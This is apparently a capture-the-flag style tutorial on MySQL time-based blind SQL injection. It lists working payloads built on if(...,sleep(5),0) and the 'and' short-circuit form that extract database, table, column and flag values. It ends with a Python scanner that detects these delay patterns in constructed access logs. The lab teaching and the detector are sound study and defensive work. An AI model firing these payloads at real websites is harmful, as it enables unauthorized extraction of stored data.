一、SQL basics
sleep
benchmark
二、Time-based blind injection
Introduction
Practice
Payload
Guess the database name length
id=1 and if((length(database())=3),sleep(5),0)%23
This payload is very much like the Boolean-based blind injection we used before; the only difference is a delay added where the result is returned: if the length we guess is correct, the response is delayed. Let's start practicing.
Finding the injection point
This time the four probes we used before all return the same result:
id=1 (shows hello)
id=1' (shows hello)
id=1'%23 (shows hello)
id=1 %23 (shows hello)
So we need another way to test whether the injection point is string-typed or numeric:
id=1 and sleep(5)%23 (delay)
id=1' and sleep(5)%23 (no delay)
The probe without the quote produces the delay, so the injection point is numeric.
Start guessing the length. Guessing 1, the server returns the data immediately, so the length is wrong; try 3 instead:
This time there is a blank waiting period and the data only comes back after a while, so the guess is right: the length is 3.
The payloads for guessing the database name are also like Boolean-based blind injection, with just an extra delay function. Below I won't wait out the delays and will just list the payloads:
Guess the database name length
id=1 and if((length(database())=3),sleep(5),0)%23
Guess the database name
id=1 and if((ascii(substr((select database()),1,1))=118),sleep(5),0)%23
Guess the table name length
id=1 and if((select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=8,sleep(5),0)%23
Guess the table name
id=1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=118),sleep(5),0)%23
Guess the column name length
id=1 and if((select length(group_concat(column_name)) from information_schema.columns where table_name='flag')=7,sleep(5),0)%23
Guess the column name
id=1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))=118),sleep(5),0)%23
Guess the data length
id=1 and if(((select length(flag) from flag)=38),sleep(5),0)%23
Guess the data
id=1 and if((ascii(substr((select flag from flag),1,1))=102),sleep(5),0)%23
The and short-circuit property
select 1<2 and sleep(5);
select 1>2 and sleep(5);
The first statement pauses for 5 seconds; the second returns immediately, because once the left operand of and is false MySQL never evaluates sleep(5). That is what lets the condition itself replace the if wrapper:
Guess the database name length
id=1 and length(database())=3 and sleep(5)%23
Guess the database name
id=1 and ascii(substr((select database()),1,1))=119 and sleep(5)%23
Guess the table name length
id=1 and (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())=9 and sleep(5)%23
Guess the table name
id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=102 and sleep(5)%23
Guess the column name length
id=1 and (select length(group_concat(column_name)) from information_schema.columns where table_name='flag')=4 and sleep(5)%23
Guess the column name
id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,1))=102 and sleep(5)%23
Guess the data length
id=1 and (select length(flag) from flag)=38 and sleep(5)%23
Guess the data
id=1 and ascii(substr((select flag from flag),1,1))=102 and sleep(5)%23
The sleep function's sole purpose is to produce a delay, whereas benchmark produces a delay by executing an expression many times.
The if function performs the conditional test and then chooses which expression is executed.
When if is filtered, the short-circuit property of and can be used instead, building the payload out of several and clauses.
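The detection counterpart to both payload families above, as an added example that is not part of the original post: a Python scanner over constructed access-log lines that flags the three delay forms this page uses (the if(...,sleep(5),0) wrapper, the and short-circuit variant used when if is filtered, and benchmark) and records whether the response was actually slow, which is the observable a time-based probe is trying to produce. The log format, the IPs and the request lines are all constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# One regex per delay form used on this page. Values are URL-decoded by parse_qsl
# before matching, so %23 has already become '#' and '+' a space.
PATTERNS = {
    "if-sleep":  re.compile(r"\bif\s*\(.*\bsleep\s*\(", re.I | re.S),  # if(cond,sleep(n),0)
    "and-sleep": re.compile(r"\band\s+(?:\(\s*)*sleep\s*\(", re.I),     # cond and sleep(n)
    "benchmark": re.compile(r"\bbenchmark\s*\(\s*\d", re.I),            # benchmark(n, expr)
}

def classify_request(target: str) -> list[str]:
    """Return the names of the delay patterns found in any query parameter
    of a request target such as '/item?id=1+and+sleep(5)%23'."""
    hits = []
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for label, rx in PATTERNS.items():
            if label not in hits and rx.search(value):
                hits.append(label)
    return hits

def scan_log(log_text: str, slow_ms: int = 3000) -> list[tuple[str, list[str], bool]]:
    """Scan constructed log lines '<ip> <response_ms> <method> <target> <proto>' and
    return (ip, patterns, slow) for each request carrying a delay pattern. A request
    that both matches and was slow means the probe's condition evaluated true and
    the database executed the delay, i.e. the injection point is live."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines
        ip, ms, _method, target, _proto = parts
        hits = classify_request(target)
        if hits:
            findings.append((ip, hits, int(ms) >= slow_ms))
    return findings

# Constructed sample traffic (fictional IPs); the probes mirror this page's payloads.
SAMPLE_LOG = """\
10.0.0.5 12 GET /item?id=1 HTTP/1.1
10.0.0.9 15 GET /item?id=1+and+if((length(database())%3D1),sleep(5),0)%23 HTTP/1.1
10.0.0.9 5018 GET /item?id=1+and+if((length(database())%3D3),sleep(5),0)%23 HTTP/1.1
10.0.0.9 5021 GET /item?id=1+and+length(database())%3D3+and+sleep(5)%23 HTTP/1.1
10.0.0.9 5009 GET /item?id=1+and+benchmark(5000000,md5(1))%23 HTTP/1.1
10.0.0.7 20 GET /item?id=42&sort=name HTTP/1.1
"""

if __name__ == "__main__":
    for ip, hits, slow in scan_log(SAMPLE_LOG):
        print(f"{ip}: {','.join(hits)} {'SLOW' if slow else 'fast'}")
```

A fast response with a matching pattern (the second line) is a wrong guess; the slow ones are the guesses that landed, so alerting on the pattern alone catches the probing while the latency column tells you whether the backend is actually vulnerable.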